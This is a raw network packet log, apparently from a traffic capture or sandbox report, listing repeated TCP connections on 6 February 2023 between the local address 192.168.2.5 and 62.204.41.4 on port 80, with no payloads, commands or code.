                                                        Feb 6, 2023 14:18:56.330073118 CET5016380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.446863890 CET5016380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.447689056 CET5016480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.508064032 CET805016462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.509455919 CET805016362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.509702921 CET5016380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.510220051 CET5016480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.510220051 CET5016480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.570744038 CET805016462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.573378086 CET805016462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.573653936 CET5016480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.680872917 CET5016480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.681755066 CET5016580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.741417885 CET805016462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.741605043 CET5016480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.743077993 CET805016562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.743251085 CET5016580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.744687080 CET5016580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.806056976 CET805016562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.808456898 CET805016562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.808552980 CET5016580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.915117979 CET5016580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.915918112 CET5016680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.976373911 CET805016662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.976514101 CET805016562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.976682901 CET5016580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.976716042 CET5016680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.977674007 CET5016680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.038008928 CET805016662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.042531967 CET805016662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.042804003 CET5016680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.150307894 CET5016680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.151278973 CET5016780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.210629940 CET805016662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.210791111 CET5016680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.211641073 CET805016762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.211745024 CET5016780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.212251902 CET5016780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.272650003 CET805016762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.275357962 CET805016762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.275538921 CET5016780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.384404898 CET5016780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.385277033 CET5016880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.445075989 CET805016762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.445293903 CET5016780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.447654963 CET805016862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.447849989 CET5016880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.456115007 CET5016880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.518465042 CET805016862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.522361994 CET805016862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.522507906 CET5016880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.634732008 CET5016880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.635369062 CET5016980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.700062037 CET805016962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.700103998 CET805016862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.700258970 CET5016880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.700716019 CET5016980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.700716019 CET5016980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.761970043 CET805016962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.764674902 CET805016962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.764745951 CET5016980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.868719101 CET5016980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.869806051 CET5017080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.929409027 CET805017062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.929563046 CET5017080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.929903984 CET805016962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.930095911 CET5016980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.930319071 CET5017080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:57.990003109 CET805017062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.992721081 CET805017062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:57.992832899 CET5017080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.102581024 CET5017080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.103195906 CET5017180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.162280083 CET805017062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.162398100 CET5017080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.164724112 CET805017162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.164845943 CET5017180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.166615963 CET5017180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.228157997 CET805017162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.233177900 CET805017162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.233246088 CET5017180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.337157965 CET5017180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.337835073 CET5017280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.398103952 CET805017262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.398291111 CET5017280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.398575068 CET805017162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.398669958 CET5017180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.399243116 CET5017280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.459544897 CET805017262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.462138891 CET805017262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.462347984 CET5017280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.575016022 CET5017280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.575839043 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.635586023 CET805017262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.635695934 CET5017280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.637398958 CET805017362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.637542963 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.637896061 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.699395895 CET805017362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.705470085 CET805017362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.706880093 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.822626114 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.824182034 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.884291887 CET805017362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.884337902 CET805017462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.884469032 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.884519100 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.884943008 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.945087910 CET805017462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.947803974 CET805017462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.951764107 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.056782961 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.058641911 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.117338896 CET805017462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.117574930 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.119364977 CET805017562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.121509075 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.121879101 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.182511091 CET805017562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.186496019 CET805017562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.186649084 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.292296886 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.293025970 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.353344917 CET805017562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.353565931 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.355142117 CET805017662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.358557940 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.358931065 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.421020031 CET805017662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.424455881 CET805017662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.424662113 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.543790102 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.544636965 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.606141090 CET805017762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.606178045 CET805017662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.606442928 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.606628895 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.607120991 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.668508053 CET805017762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.670885086 CET805017762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.671051025 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.782175064 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.783659935 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.843275070 CET805017862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.843436956 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.843719959 CET805017762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.843812943 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.843879938 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.903326035 CET805017862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.905893087 CET805017862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.906096935 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.009356022 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.010201931 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.069901943 CET805017862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.069993973 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.071516991 CET805017962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.071633101 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.072206974 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.133519888 CET805017962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.137847900 CET805017962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.138003111 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.244137049 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.246793032 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.305661917 CET805017962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.305830002 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.307992935 CET805018062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.308157921 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.308509111 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.369777918 CET805018062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.373677015 CET805018062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.373883009 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.493810892 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.494616032 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.555352926 CET805018062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.555454969 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.557210922 CET805018162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.557301044 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.557837009 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.620642900 CET805018162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.622848034 CET805018162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.622910023 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.727744102 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.728379965 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.787766933 CET805018262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.787888050 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.788880110 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.790395021 CET805018162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.790462971 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.848211050 CET805018262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.851037979 CET805018262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.851135969 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.962735891 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.964380980 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.022269011 CET805018262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.023164034 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.025810957 CET805018362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.025927067 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.029659033 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.091197968 CET805018362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.094944000 CET805018362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.095067978 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.197139978 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.197870970 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.258229017 CET805018462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.258395910 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.258553982 CET805018362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.258616924 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.259062052 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.319324970 CET805018462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.322190046 CET805018462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.322340965 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.431324005 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.431972027 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.491750002 CET805018462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.491854906 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.492134094 CET805018562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.492218971 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.492595911 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.552925110 CET805018562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.556504965 CET805018562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.556687117 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.666157961 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.667057991 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.726747036 CET805018562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.726864100 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.728457928 CET805018662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.728600979 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.729093075 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.790524960 CET805018662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.793245077 CET805018662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.794925928 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.909929991 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.910618067 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.970979929 CET805018762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.971352100 CET805018662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.971546888 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.971976042 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.971976042 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.032232046 CET805018762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.037403107 CET805018762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.037612915 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.152431965 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.153033972 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.213015079 CET805018762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.214415073 CET805018862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.214561939 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.214620113 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.215107918 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.276766062 CET805018862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.280091047 CET805018862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.280469894 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.384443045 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.385456085 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.446165085 CET805018862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.446850061 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.448035002 CET805018962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.450968027 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.451596022 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.514158964 CET805018962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.517589092 CET805018962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.517777920 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.634754896 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.635955095 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.697396994 CET805018962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.697599888 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.698159933 CET805019062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.698277950 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.698642015 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.760833025 CET805019062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.763273954 CET805019062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.763459921 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.885102034 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.885946035 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.947280884 CET805019162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.947319984 CET805019062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.947525024 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.948024988 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.948024988 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.009222031 CET805019162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.012465954 CET805019162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.012581110 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.123766899 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.124630928 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.185605049 CET805019262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.185645103 CET805019162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.185853004 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.186394930 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.186395884 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.246762037 CET805019262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.250641108 CET805019262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.250869989 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.353341103 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.354250908 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.413883924 CET805019262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.413975954 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.416862965 CET805019362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.417015076 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.417591095 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.479909897 CET805019362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.482860088 CET805019362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.482960939 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.588080883 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.588968039 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.648308039 CET805019462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.648437023 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.649008036 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.650507927 CET805019362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.650607109 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.708261013 CET805019462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.710764885 CET805019462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.710855961 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.823386908 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.826237917 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.882898092 CET805019462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.883034945 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.887649059 CET805019562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.887762070 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.888103962 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.949440002 CET805019562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.951908112 CET805019562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.952028990 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.060388088 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.061306000 CET5019680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.121963024 CET805019562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.122092962 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.122922897 CET805019662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.123018026 CET5019680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.123384953 CET5019680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.185039997 CET805019662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.188596964 CET805019662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.188679934 CET5019680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.307188988 CET5019680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.307991982 CET5019780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.369242907 CET805019762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.369313002 CET805019662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.369446039 CET5019780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.369489908 CET5019680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.369822979 CET5019780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.431088924 CET805019762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.433660030 CET805019762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.433800936 CET5019780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.556555033 CET5019780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.557212114 CET5019880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.617881060 CET805019762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.618479013 CET805019862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.618597984 CET5019780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.618649960 CET5019880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.619859934 CET5019880192.168.2.562.204.41.4
